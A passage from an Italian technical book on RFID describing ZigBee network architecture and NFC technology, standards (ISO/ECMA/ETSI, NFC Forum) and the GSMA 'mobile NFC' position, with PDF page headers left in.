tradizionali, computer e terminali mobili, ma piuttosto con reti a bassobitrate e basso consumo che colleghino oggetti quali gli interruttori dellaluce, le serrature, i sensori ambientali o gli allarmi a cui fornire la capaci-tà di integrarsi in una rete domotica. Questi oggetti non richiedono velo-cità, avendo poche informazioni da scambiare. Hanno piuttosto bisognodi consumare poca energia e consentire ai terminali di funzionare perlungo tempo (mesi o anni) con le batterie incorporate. La scelta di avereuna banda ridotta e uno scarso raggio di azione implica un consumo elet-trico limitato. Secondo le intenzioni dell'alleanza un comune nodo ZigBeedovrebbe essere in grado di funzionare uno o due anni sfruttando unasola batteria alcalina.Sfruttando lo standard ZigBee dovrebbe essere possibile integrare una

sorta di TAG su ogni sistema di comando, per quanto semplice esso sia(interruttore della luce, condizionatori, ventole, sistemi di riscaldamento,serrature, uscite di emergenza, serrande automatiche, allarmi, sbarre diuscita). Dovrebbe, quindi, essere possibile monitorare e controllare lostato dei sistemi in maniera centralizzata in ambiente domestico, commer-ciale o industriale; una sorta di super-telecomando e telecontrollo.ZigBee non è solo uno standard nel settore delle reti di sensori ed

2-parteV.qxp:RFID 5-09-2008 10:59 Pagina 249

Page 239: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva250

attuatori, vi è infatti una oggettiva vicinanza con il mondo degli RFID atti-vi, per le applicazioni cosiddette “closed loop” (TAG recuperabile eriusabile nella catena di distribuzione). Ciò è maggiormente vero conside-rando la migrazione degli RFID attivi dalla semplice funzione di identifi-cazione automatica a quelle legate al mondo della sensoristica. I TAGattivi, dotati di sensori e funzioni avanzate costituiscono, infatti, un’areadi funzionalità che si colloca come punto di collegamento tra l’ambienteRFID ed il mondo delle reti. ZigBee copre perfettamente quest’area in cuil’identificazione automatica è solo una delle molteplici funzioni degliapparati emergenti che somiglieranno sempre più a piccoli computerradiocollegati al costo di qualche Euro. Questi apparati avranno differen-ze sostanziali rispetto agli attuali TAG attivi; basti pensare alle funziona-lità di una rete Mesh che consente di comunicare con i nodi, attraversoaltri nodi; ad esempio in applicazioni logistiche, dovrebbe essere possibi-le la comunicazione con i container di un intero interporto senza dissemi-nare l’interporto stesso di Reader connessi in rete.

TECNOLOGIA

Lo standard ZigBee opera principalmente nella banda ISM 2,5 GHz, lastessa utilizzata da RadioLan generiche, WiFi, Bluetooth, Wibree, nonchéda qualche TAG RFID passivo. Questo garantisce la possibilità di instal-lare gli apparati in maniera libera, senza richiedere autorizzazioni.Le altre caratteristiche di progettazione sono elencate di seguito:

• Frequenza operativa universale: 2,4 GHz – 16 canali- in Europa anche 868 MHz – 1 canale- in USA anche 915 MHz – 16 canali

• Interfaccia radio avanzata:- Modulazione direct sequence spread spectrum- Codifica orthogonal QPSK (due bit per simbolo) nella banda 2,4GHz − BPSK nelle bande 868 e 915 MHz

• Elevata autonomia, specie dei nodi terminali, progettati per operare abatterie da tre mesi a tre anni, con conseguente riduzione dei costi digestione della rete.

V.4.1

2-parteV.qxp:RFID 5-09-2008 10:59 Pagina 250

Page 240: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE V - ULTERIORI TECNOLOGIE DI PROSSIMITÀ251

• Sistema ottimizzato per basso consumo di energia (applicazioni a duty-cycle bassissimo <0,1%, con alto risparmio di energia)- Protocollo di accesso al canale di tipo beaconing networks, oppureCSMA-CA, produce alto throughput e bassa latenza per apparatiche operano con basso “Duty Cycle” come i sensori

- Opzionalmente time slot garantito per applicazioni a bassissimalatenza

• Possibilità di realizzare reti Mesh (reti in cui gli apparati possono dive-nire essi stessi nodi di smistamento delle informazioni) il che estende laportata della rete, aumenta l’affidabilità e soprattuto la resistenza ainterferenze e guasti di apparati potendo modificare i percorsi dellacomunicazione a seconda delle condizioni al contorno.- Topologie multiple di rete: Peer-to-Peer, Star, Mesh, Hybrid (Mesh+ Star)

• Gran numero di apparati collegabili (ampio spazio di indirizzamento);ovvero realizzabilità di reti pervasive ed ad alta affidabilità (specie inconfigurazione Mesh)- 18 miliardi di miliardi di devices (indirizzamento a 64 bit IEEE)- 65.535 networks

• Limitata velocità di trasmissione; una rete di sensori ed attuatori nonnecessita di larga banda.- Bitrate lordi disponibili all’interfaccia aerea: 250 kbps a 2,4 GHz(40 kbps a 915 MHz e 20 kbps a 868 MHz)

• Alta sicurezza del collegamento:- Lo standard include funzioni di autenticazione e crittografia simme-trica (AES-128) tra apparati sia a livello di rete, che a livello MACche a livello applicativo

- Tre livelli gerarchici di chiavi: Master Keys, Network Keys, LinkKeys

- Protocollo con PDU confermate (Fully hand-shaked protocol) peraffidabilità della trasmissione.

• Operatività in un raggio tipico di circa 50 metri (5÷500 m in baseall’ambiente).

2-parteV.qxp:RFID 5-09-2008 10:59 Pagina 251

Page 241: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva252

ARCHITETTURA E STACK PROTOCOLLARE DELLE RETI ZIGBEE

In linea con l’analogia di una colonia di api, formata da una regina edalle operaie, anche ZigBee è un’organizzazione gerarchica. Lo standarddefinisce tre livelli di funzioni logiche degli apparati:- ZigBee Coordinator – ZC (Controller)È l’elemento più complesso. Opera come nodo radice della rete adalbero di coordinamento, inizializza la rete, gestisce i vari nodi, operala raccolta dati ed è in grado di operare come bridge verso altre reti.Per ogni rete viene designato un Coordinator che contiene le informa-zioni sulla rete e le chiavi di sicurezza.

- ZigBee Router – ZR; (detto anche Full Function Device – FFD)È un dispositivo client; genera informazioni e le invia al nodo centrale.Può anche agire come router intermedio per il rilancio verso il nodocentrale di informazioni da altri dispositivi.

- ZigBee End Device – ZED; (detto anche Reduced Function Device –RFD o, semplicemente, nodo)È un dispositivo client; genera informazioni e le invia al Coordinator o

V.4.2

Figura V.14Stack architetturale ZigBee

[ZigBeeTM Alliance/Copyright © 2004]

2-parteV.qxp:RFID 5-09-2008 10:59 Pagina 252

Page 242: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE V - ULTERIORI TECNOLOGIE DI PROSSIMITÀ253

al Router, ma non opera come intermediario per altri dispositivi.È l'elemento più semplice ed economico, destinato agli oggetti (inter-ruttori, TV, radio, lampade, elettrodomestici, ecc.).

Si possono realizzare reti a topologia Mesh, in cui sottoreti a stella (unoZR/FFD che coordina diversi ZED/RFD) si interfacciano mediante colle-gamenti diretti fra FFD.

Diversi dispositivi possono integrare RFD ZigBee ed essere pilotati daun set-top-box centrale con un FFD.

Figura V.15Piattaforme hardware vs. Funzioni logiche vs.

Applicazioni degli apparati ZigBee[ZigBeeTM Alliance/Copyright © 2004]

Figura V.16Topologia di rete Mesh ZigBee

[ZigBeeTM Alliance/Copyright © 2004]

Applicazioni

Funzione logica degliapparati

in una rete ZigBee

Piattaforme hardware

2-parteV.qxp:RFID 5-09-2008 10:59 Pagina 253

Page 243: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva254

I vari set-top-box possono poi essere combinati in una "rete domotica"attraverso link diretti fra gli FFD.Il protocollo è concepito per mettere in piedi automaticamente la rete

tra i nodi. In reti di dimensioni maggiori la rete sarà un cluster di cluster.La rete opera in due modalità distinte:

- Beaconing,i sistemi comunicano sulla rete a intervalli regolari e poi si pongono inuno stato di inattività a basso consumo.Nelle reti abilitate alla segnalazione (beacon enabled networks) i nodidella rete (router) trasmettono periodicamente segnalazioni (beacons)per segnalare la loro presenza agli altri nodi della rete. Nel tempo tra lesegnalazioni i nodi terminali (ZED) possono restare in stand-by. Inquesto modo operano con un basso “Duty Cycle” prolungando la vitadelle batterie. In genere si tende a minimizzare il tempo di attività deisistemi, ma intervalli di beaconing lunghi richiedono temporizzazioneprecisa che comporta aumenti di costo.

- Non-beaconing,in cui la potenza impiegata dai dispositivi viene decisa in modo asim-metrico, alcuni di questi infatti sono sempre accesi, altri sono spentinella maggior parte del loro tempo e si acendono solo per trasmettere.Nelle reti non abilitate alla segnalazione (non-beacon enabled networks)viene adoperato un protocollo di accesso al canale (protocollo anti-col-lisione) del tipo unslotted CSMA/CA (il terminale verifica che il canalesia libero prima di trasmettere e ritrasmette in caso di collisione). Reti diquesto tipo richiedono che i router rimangano sempre attivi (per riceve-re) consumando energia, mentre i terminali (ZED) trasmettono solo sericevono un comando esterno e consumano energia solo nel momentodella trasmissione. Esistono tre eccezioni all’uso del CSMA:- I beacon sono inviati con una temporizzazione predeterminata e nonusano CSMA.

- Anche i messaggi di “acknowledgements” non usano CSMA.- Nelle reti “beacon oriented” possono essere definiti terminali “realtime” a bassa latenza che trasmettono in un time slot garantito(GTS).

2-parteV.qxp:RFID 5-09-2008 10:59 Pagina 254

Page 244: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE V - ULTERIORI TECNOLOGIE DI PROSSIMITÀ255

Un esempio di rete non-beaconing è dato dai telecomandi. Il nodo sul-l’apparato telecomandato (un coordinator) riceve in continuazione (e traealimentazione dall’apparato comandato). Il telecomando (a batteria) (unoZED) rimane silente finché l’utente non attiva il telecomando, a questopunto questo invia il comando, attende l’acknowledgment, quindi tornain stand by.

NEAR-FIELD-COMMUNICATION (NFC)Gli apparati NFC (Near Field Communication) (cfr. §I.4.4) sono sistemiin rapido sviluppo derivati dalla tecnologia degli RFID e delle smart-card(cfr. §I.4.3).Anche gli NFC nascono da un’iniziativa volontaria di gruppi industria-

li per creare un ‘ponte’ tra i terminali mobili consumer e le tecnologiedelle carte senza contatto.Per promuovere l’uso degli NFC sviluppandone le specifiche è nato nel

2004, per iniziativa di Sony, Philips e Nokia, l’NFC Forum [www.nfc-forum.org], associazione non-profit che conta ormai più di cento membri.Tra questi, produttori di hardware come HP, Samsung, Motorola e LG,di carte di credito come MasterCard, Visa e American Express, operatoritelefonici come SK telecom, Telefonica, TeliaSonera e Vodafone, associa-zioni non-profit come Mobey Forum.La missione del Forum è di assicurare l’interoperabilità tra i dispositi-

vi e i servizi e di promuovere sul mercato la tecnologia NFC.Le caratteristiche salienti degli NFC sono:

• Comunicazione a corto raggio (fino a 10 cm).• Superamento sia della distinzione tra Reader e TAG, sia di quella traapparati attivi e passivi.

• Integrazione nello stesso chip delle funzioni di una smartcard senzacontatto e di un Reader.

• Frequenza operativa 13,56 MHz (come le smart-card) e compatibilitàopzionale, con le carte ISO/IEC 14443 o ISO/IEC 15693.

• Comunicazione a moderato bitrate (max velocità 424 kbit/s).• Principali applicazioni che comprendono le transazioni per ticketing e

V.5

2-parteV.qxp:RFID 5-09-2008 10:59 Pagina 255

Page 245: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva256

pagamenti sicuri (utilizzando come portafoglio carte di credito o SIMper telefonia mobile). Possono anche essere usati per comunicazioni divario genere tra apparati elettronici.Gli NFC non sono progettati per una rete di dispositivi o per la tra-

smissione di grandi moli di dati, ma dovrebbero consentire un opportunoscambio dati tra TAG a basso costo (es. etichette RFID) e dispositivi elet-tronici (es. PDA o telefoni cellulari). Un’applicazione tipica è il ticketing,realizzato attraverso un PDA o un telefono cellulare dell’utente a cui èassociato un NFC che si interfaccia con obliteratrici di biglietti, parchime-tri o altro, dotati anch’essi di NFC.

TECNOLOGIA

Le caratteristiche essenziali degli NFC comprendono il superamento siadella rigida distinzione tra Reader e TAG, sia quella tra apparati attivi epassivi, il tutto incorporando le caratteristiche di sicurezza e la capacità dioperare transazioni delle carte senza contatto. Un apparato NFC, infatti,può interrogare ed essere interrogato e, quando opera come TAG, puòfunzionare in modalità attiva o passiva.La comunicazione quindi può operare in modi diversi a seconda che gli

apparati coinvolti si comportino come attivi (generando la potenza per latrasmissione) o passivi (operando la modulazione del segnale riflesso) edil modo in cui i dati vengono trasmessi dipende da questo.Inoltre nella comunicazione tra NFC, oltre alla modalità attiva e passi-

va, un apparato può giocare due differenti (ed intercambiabili) ruoli:- Initiator (che invia un messaggio - “message”)- Target (che invia una risposta - “reply” - al messaggio)- “message” e”reply” sono le due primitive fondamentali per la comuni-cazione.Questo significa che l’apparato A manda un messaggio ad un apparato

B che risponderà con una risposta.Non è possibile, per l’apparato B, mandare dati ad A senza ricevere un

messaggio da questo (a cui possa replicare).Il ruolo di A, che inizia lo scambio di dati, è detto “initiator”, quello di

V.5.1

2-parteV.qxp:RFID 5-09-2008 10:59 Pagina 256

Page 246: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE V - ULTERIORI TECNOLOGIE DI PROSSIMITÀ257

B è detto “target”.Non tutti i ruoli sono compatibili con tutte le modalità operative

La frequenza operativa è sempre di 13,56 MHz, la modulazione dipen-de dalla velocità di trasmissione e dalla modalità operativa.

Inoltre lo schema di codifica e l’indice di modulazione dipendono dallavelocità di trasmissione.Per 106 kbit/s viene usato un indice di modulazione pari al 100%, ciò

significa che l’ampiezza del segnale modulato varia da zero all’ampiezzamassima della portante.Per velocità superiori, viene usato un indice di modulazione pari al

10%, ciò significa che (stando alla definizione contenuta negli standard)l’ampiezza del segnale modulato varia da zero all’82% dell’ampiezza mas-sima della portante.Queste differenze tra indici di modulazione possono interessare le pro-

cedure di sicurezza (cfr. §VIII.5.2.4).Nella modalità operativa passiva, i dati delle “reply” sono inviati nella

modalità consueta dei TAG passivi ad accoppiamento induttivo (modula-zione del carico dell’antenna ricevente).I dati sono sempre codificati Manchester con un indice di modulazio-

ne pari al 10%. Per la velocità di 106 kbit/s viene modulata una sottopor-tante; per velocità superiori viene modulata la portante a 13,56 Mbit/s.

Figura V.17Ruoli e modalità operative degli NFC

Tabella V.2Velocità di trasmissione e modalità operative

2-parteV.qxp:RFID 5-09-2008 10:59 Pagina 257

Page 247: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva258

Va infine ricordato che un initiator può inviare un messaggio che vengaricevuto da una molteplicità di apparati con funzioni target. In questocaso tutti gli apparati sono abilitati alla risposta ma, prima di ottenerla, l’i-nitiator deve selezionare il target da cui vuole la risposta, gli altri nonrisponderanno. Non sono infatti previsti veri e propri messaggi broadcastche provochino risposta contemporanea da più target.

5.1.1 Intergrazione tra NFC e dispositivo d’utente

Il terminale d’utente più comune, per applicazioni NFC è il telefonomobile. Il telefonino, in questi casi ospita essenzialmente un microcircui-to, chiamato “NFC package”, che contiene tutte le componenti in tecno-logia NFC.L’NFC package da un lato è connesso ad un’antenna a spira adatta alla

frequenza di 13,56 MHz per comunicare con l’altro NFC (esterno) o conun TAG RFID a 13,56 MHz, dall’altro lato l’NFC package comunicainternamente con la carta SIM del telefonino (propriamente chiamataUICC) per operare la comunicazione verso l’esterno con gli apparati delcircuito finanziario attraverso la rete di telefonia mobile. Naturalmenteesiste anche (non illustrata in figura) la connessione all’alimentazione elet-trica (batteria del telefonino).A sua volta, l’NFC package contiene al suo interno due chip con fun-

zioni distinte:- Il “Connectivity chip” nel quale risiedono le funzioni proprie dell’NFC.La personalizzazione delle applicazioni viene effettuata, dall’esterno,attraverso il protocollo NFC/OTA che opera attraverso la connessionedi telefonia mobile (EDGE/GPRS o altro).

- Il “Multi-application chip smartMX” ovvero un microcontroller suchip progettato per essere incorporato nelle smart card, nel quale risie-dono le applicazioni di pagamento. Pienamente compatibile con i chipMIFARE® PROX range, SmartMX dovrebbe includere un processoreper crittografia, un’interfaccia di comunicazione (UART UniversalAsynchronous Receiver-Transmitter che converte i dati da un formatoparallelo a un formato seriale asincrono e viceversa) nonché dei sistemidi protezione (sensori di tensione, temperatura, luce, frequenza, ecc.)

Figura V.18TAG attivo compatibile 802.11

AeroScout, Inc.Batterie al litio 3,6V (sostituibili);

autonomia 2÷3 anni per trasmissione ogni 30s

2-parteV.qxp:RFID 5-09-2008 10:59 Pagina 258

Page 248: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE V - ULTERIORI TECNOLOGIE DI PROSSIMITÀ259

contro attacchi fisici mirati all’analisi dei dati contenuti.Quando un NFC opera in modo attivo, deve essere usato sfruttando le

capacità di SmartMX (una contactless smart card 14443A è passiva).NFC, però è separato dall’ambiente applicativo della contactless smart

card (multi-application java card secure environment) che comprendeanche le funzionalità di “secure element” (esempio: chavi di cifratura percontrollo accessi o transazioni elettroniche). Per questo ambiente sono pos-sibili varie soluzioni tecnologiche, la politica degli MNO (Mobile NetworkOperator) comunque è quella di farlo risiedere all’interno della SIM.La smartcard elettronica, pertanto, risiede dentro il telefonino cellula-

re e, considerato che si tratta di materia ancora sperimentale, si preferiscenon proporre schemi illustrativi che di volta in volta la vogliono localizza-ta all’interno della SIM o dell’NFC Package, ma solo identificarne lecaratteristiche stabilizzate.

5.1.2 Gestione delle applicazioni Over-The-Air: la tecnologia OTA

Un’altra questione rilevante nell’ambito delle applicazioni NFC riguardala gestione del trasferimento delle applicazioni sul terminale (telefonino)in tecnologia NFC.Nell’ecosistema NFC la smartcard elettronica, all’interno del telefoni-

no, supporta il concetto di OTA (software per accesso alle smartcard via“Over The Air”) attraverso due accessi al mondo esterno:- il telefonino per comunicazioni attraverso la rete mobile, usata sia dalleapplicazioni, sia per l’aggiornamento di queste via OTA;

- il “Connectivity Chip” NFC, che opera secondo lo stesso standarddelle Contactless Card (13.56MHz, distanze < 10cm).La smartcard elettronica, inoltre, contiene, come le ordinarie carte con-

tactless passive, aree dedicate a domini individuali per ogni “service pro-vider” di ogni applicazione. L’accesso via OTA avviene separatamente aciascun dominio. Ogni dominio ha una chiave di sicurezza (del dominio)ed ogni applicazione ha un unico identificatore. Solo il “service provider”di ogni applicazione può, attraverso OTA, leggere e aggiornare il conte-nuto del proprio dominio all’interno della smartcard elettronica.Si propone, a questo proposito, uno schema di principio di origine Nokia.

2-parteV.qxp:RFID 5-09-2008 10:59 Pagina 259

Page 249: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva260

Con OTA si intende, pertanto, una tecnologia utilizzata per comunica-re con la smartcard elettronica all’interno del telefonino trasferendo oaggiornando applicazioni su di essa. L’architettura OTA è basata su unastruttura client/server, in cui la parte server è costituita dal sistema diback-end di un operatore (application server, sistema di fatturazione),mentre il client è la smartcard elettronica all’interno del cellulare. Nelcaso in cui la smartcard elettronica sia ospitata nella SIM, la tecnologiaOTA consente agli operatori di rete di introdurre servizi aggiuntivi all’in-terno delle SIM card tra cui quelli che interessano le applicazioni NFC.Diverse aziende come:• Cassis [http://www.cassis-intl.com/news/news_nfc_europe.html],• VIVOtech [http://www.vivotech.com/products/vivo_nfc/index.asp],• Gemplus [http://www.gemplus.com/products/gemconnect_ota/]• G&D [http://www.gi-de.com/portal/page?_pageid=42,55178&_dad=por-tal&_schema=PORTAL]propongono ognuna la propria piattaforma proprietaria per la gestione

delle applicazioni OTA.

Figura V.19Schema di principio per la gestione di

applicazioni NFC via OTA

2-parteV.qxp:RFID 5-09-2008 10:59 Pagina 260

Page 250: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE V - ULTERIORI TECNOLOGIE DI PROSSIMITÀ261

5.1.3 Sicurezza nei dispositivi NFC

Un aspetto fondamentale quando si tratta lo scambio di dati sensibili tracui quelli necessari per effettuare pagamenti (numero della carta di credi-to e simili), è quello relativo alla sicurezza. La tecnologia NFC è in gradodi assicurare un livello di sicurezza sensibilmente maggiore di quello deigenerici RFID, grazie a diversi fattori.Il primo è relativo al fatto che il dispositivo NFC incorpora, nella

comunicazione, le funzioni crittografiche tipiche delle smart card.Il secondo è relativo al fattore ambientale. NFC infatti opera a corto

raggio (tipicamente 4-5 centimetri) con potenze quindi sensibilmente piùbasse di quelle di una coppia Reader - TAG tradizionali. In tali condizio-ni pertanto risulta pittosto difficoltoso intercettare la comunicazione peracquisire dati sensibili.Una trattazione più approfondita sugli aspetti di sicurezza si può tro-

vare nella parte VIII di questo volume: “Sicurezza & Privacy nei sistemiRFID”.

STANDARD

5.2.1 ISO ECMA ed ETSI

Gli standard per i protocolli di comunicazione NFC sono definiti, inmodo identico, in ISO ed ECMA, parzialmente anche in ETSI. I princi-pali standard sono:- L’NFCIP-1 descrive l’interfaccia radio, l’inizializzazione, l’anti-collisio-ne, un formato di trama e un protocollo di scambio dati a blocchi congestione degli errori. Vengono definiti sia un modo di comunicazioneattivo (TAG e Reader producono una trasmissione RF), sia un modo dicomunicazione passivo (il Reader genera una radiofrequenza ed il TAGpassivo risponde modulando il carico d’antenna, come d’uso nei TAGad accoppiamento induttivo).Gli standard ETSI TS 102.190, ISO/IEC 18092 ed ECMA 340 defini-scono (in modo identico) NFCIP-1

- L’NFCIP-2 cche specifica un meccanismo di selezione tra differenti

V.5.2

2-parteV.qxp:RFID 5-09-2008 10:59 Pagina 261

Page 251: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva262

modi di comunicazione. Questo protocollo si riferisce al fatto che glistessi dispositivi possano comunicare come NFCIP-1, oppure comecarte ISO/IEC 14443 o ISO/IEC 15693, in tutti i casi operando a 13,56MHz. Viene quindi definita la modalità con cui un apparato conformead NFCIP-2 possa realizzare la comunicazione in una delle tre modali-tà sopradescritte.Gli standard ISO/IEC 21481 ed ECMA 352 definiscono (in modoidentico) NFCIP-2.Si prevedono inoltre ulteriori sviluppi tendenti a far comunicare gliNFC con gli altri dispositivi RFID operanti nella banda 13,56 MHz, adesempio consentire alla clientela, dotata di “telefonini NFC”, la letturadelle “etichette intelligenti” (i comuni TAG passivi operanti a 13,56MHz ed associati agli oggetti) nei supermercati, grandi magazzini,musei ed altri luoghi in cui siano esposti oggetti dei quali si desideraacquisire informazioni.

- L’NFC–WI (wired interface) che regola lo scambio dati (attraverso l’in-tefaccia “wired”) tra dispositivo NFC e “front-end” dell’apparato chelo ospita. Nel caso del terminale telefonico si tratta dell’interfacciawired tra NFC e UICC (SIM). Le specifiche includono i cavi di segna-le, i segnali binari, i diagrammi di stato del protocollo e la codifica deibit. L’NFC-WI è ancora in sviluppo, le ipotesi correnti sono:- Standard ISO/IEC DIS 28361 ed ECMA 373 (identici), moltoprobabilmente desueti.

- S1C / S2C SmartConnect Connectivity.- SWP (Single Wire Protocol) che attualmente è in fase di revisione finale presso ETSI ed è il maggior candidato per l’adozione.

- Altri standard specificano i metodi di test per l’NFCIP-1: ECMA-356ed ISO/IEC 22536 (RF-test methods), ECMA-362 ed ISO/IEC 23917(Protocol Test Methods).

5.2.2 NFC Forum

L’NFC Forum ha rilasciato, ad oggi, cinque specifiche che coprono partinon definite dai protocolli di comunicazione ISO/ECMA. Le specificheriguardano essenzialmente i formati dei dati:

2-parteV.qxp:RFID 5-09-2008 10:59 Pagina 262

Page 252: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE V - ULTERIORI TECNOLOGIE DI PROSSIMITÀ263

- NFC Smart Poster Record Type Definition (RTD) TechnicalSpecification;definisce il modo di inserire dati ricevuti dall’esterno quali URL, SMSnumeri di telefono in un dispositivo NFC, nonché di trasferirli ad altroapparato. Definisce inoltre un formato di dati, il cosiddetto “SmartPoster” RTD (Record Type Definition), utile in applicazioni in cui leinformazioni sono associate agli oggetti.

- NFC Data Exchange Format (NDEF) Technical Specification;descrive un formato per lo scambio di dati tra dispositivi ed etichette.Contiene le regole per costruire un messaggio NDEF e definisce il mec-canismo di incapsulamento dei dati all’interno dei messaggi.

- NFC Record Type Definition (RTD) Technical Specification;specifica i formati standard RTD per i messaggi NDEF, scambiati fra idispositivi, al fine di assicurare l’interoperabilità della tecnologia.

- NFC Text RTD Technical Specification;definisce la struttura delle informazioni per i dati dei testi, che posso-no essere usati per la descrizione di altri oggetti presenti all’interno deldispositivo. Il Text RTD può essere definito come un semplice campodi testo che aggiunge metadati a oggetti, come ad esempio gli URI(Universal Resource Identifier) ed è utile in mancanza di spazio perulteriori informazioni. Vantaggioso nel caso di lingue espresse conideogrammi, perché include informazioni aggiuntive per l’interpreta-zione del testo.

- NFC URI RTD Technical Specification:definisce la struttura dei record per contenere URI. Questi descrivonorisorse Internet che possono essere lette dagli NFC; definisce inoltre leinformazioni per trasportare una URI da un dispositivo NFC all’altro.L’URI RTD inoltre fornisce il modo per immagazzinare le URI dentroaltri elementi NFC, come ad esempio gli Smart Posters.A giugno del 2006 l’NFC Forum ha rilasciato la prima release dell’ar-

chitettura dello standard NFC (vedi Figura V.20), i protocolli per l’inte-roperabilità dello scambio di dati e la distribuzione dei servizi stand alone;ulteriori specifiche sono ancora in via di sviluppo.Il Forum ha inoltre annunciato una prima gamma di formati per le eti-

2-parteV.qxp:RFID 5-09-2008 10:59 Pagina 263

Page 253: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva264

chette (TAG) che tutti i dispositivi abilitati secondo gli standard dell’NFCForum dovranno rispettare.

5.2.3 La posizione GSMA su “mobile NFC”

La GSM Association, che raccoglie oltre 700 operatori MNO (MobileNetwork Operator) in oltre 200 paesi, ha assunto una posizione partico-larmente “forte” sull’impiego degli NFC associati ai terminali per telefo-nia mobile, coniando per loro anche un nome: “mobile NFC”.Tra le motivazioni dell’impegno, c’è la previsione di sviluppo del giro

di affari legato alle applicazioni (specie i pagamenti elettronici) e l’inten-zione degli operatori mobili di evitare che “l’intelligenza” delle applica-zioni (e di conseguenza il loro controllo economico) risieda nell’NFC onel terminale telefonico, entrambi visti solo come hardware standard cheopera funzioni di basso livello (in senso OSI) su cui le applicazioni siapoggiano con API standard. La posizione GSMA è quella di usare lacarta SIM del telefonino (propriamente chiamata UICC), che ricade total-mente sotto il controllo degli operatori mobili, come “Secure Element”.Ovvero per operare la comunicazione “sicura” verso l’esterno con gliapparati del circuito finanziario attraverso la rete di telefonia mobile. Inparticolare gli MNO mirano a:

Figura V.20Architettura NFC [NFC Forum]

2-parteV.qxp:RFID 5-09-2008 10:59 Pagina 264

Page 254: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE V - ULTERIORI TECNOLOGIE DI PROSSIMITÀ265

- affittare lo spazio, nelle loro SIM, per immagazzinare le applicazioniche fanno uso di NFC;

- non consentire a nessuno il controllo della SIM;- non permettere che il “Secure Element” risieda nel microcircuito, chia-mato “NFC package” che contiene le componenti in tecnologia NFC.Per contro, le aziende che gestiscono le varie carte di credito non

hanno intenzione di basare le proprie applicazioni sulla SIM, ma voglio-no gestire esse stesse le applicazioni che usano i propri circuiti finanziari.Il terzo gruppo di attori, le aziende manifatturiere di terminali per tele-

fonia mobile, richiedono regole chiare per produrre telefonini dotati diNFC. Un esempio può essere la scelta tra SWP (Single Wire Protocol) edaltre tecnologie concorrenti (ad esmpio SmartConnect – S2C) per l’inter-faccia wired tra NFC e SIM.Ritornando alla posizione GSMA, l’NFC è visto come “abilitatore”

della comunicazione tra oggetti con reciproco riconoscimento ed instau-razione di un “canale sicuro”.Il telefonino, per parte sua , è visto come:

- interfaccia utente;- sistema di trasmissione su rete mobile;- alimentatore elettrico.Le funzioni applicative verrebbero allora allocate nell’UICC (SIM) che

è interamente sotto il controllo dell’operatore il quale pertanto otterreb-be il controllo completo sulle applicazioni e sui loro ricavi. L’uso dellaSIM card poi, apre prospettive inedite ad applicazioni loyalty per le cate-ne di distribuzione (info sui prodotti, sconti nei pagamenti) che operanocome operatori virtuali di telefonia mobile.Le intenzioni degli operatori mobili sono obiettivamente favorite dalla

tradizione nei sistemi di telefonia mobile che non vede alcuna funzioneoperante sul telefono se questo non è corredato dalla SIM dell’operatore.Questa tradizione, peraltro, è di recente stata messa in discussione dallacomparsa di telefonini con applicazioni VoIP su WiFi accanto alla tradi-zionale telefonia mobile.A sostegno della loro politica, venti tra i maggiori MNO hanno porta-

to avanti, tra il 2006 ed il 2007 uno studio volto a chiarire gli aspetti di

2-parteV.qxp:RFID 5-09-2008 10:59 Pagina 265

Page 255: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva266

“mobile NFC” di maggior interese per gli operatori.I documenti di riferimento sono:

- GSMA Mobile NFC Services White Paper –(GSMA_153_WP510_001, febbraio 2007).

- Mobile NFC Technical Guidelines – (vs1, aprile 2007).Dai documenti di riferimento si evincono gli aspetti più rilevanti del

“mobile NFC”:- Interfaccia tra NFC ed UICC (SIM card).- Interfaccia tra il telefono (terminale) “mobile NFC” ed il Reader.- Ambiente multi-applicazione per UICCSono state anche definite alcune condizioni operative che contribuisco-

no a chiarire il quadro delle applicazioni “mobile NFC”:- Distanza operativa:definita tra 0 e 4 cm per tutte le modalità di funzionamento; Readermode, peer-to-peer mode, Card emulation mode.

- Durata della transazione:meno di 250 ns per una transazione tipo tra Reader ed il terminale NFCmobile.

- Selezione dei contesti operativi:operazione indispensabile per permetere ai dispositivi “mobile NFC”di operare con una molteplicità di tecnologie (di smart card) e di pos-sibili applicazioni.La selezione dei contesti operativi opera a vari livelli:• Selezione delle tecnologie RF

- ISO 14443A;- ISO 14443B;- ISO 18092.

• Selezone delle tecnologie della smart card- Philips MIFARE (su base ISO 14443A) nelle varianti

- Classic;- Ultralight;- DESFire.

- EMV™ (su base ISO 14443A o ISO 14443B);- Calypso (su base ISO 14443B);

2-parteV.qxp:RFID 5-09-2008 10:59 Pagina 266

Page 256: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE V - ULTERIORI TECNOLOGIE DI PROSSIMITÀ267

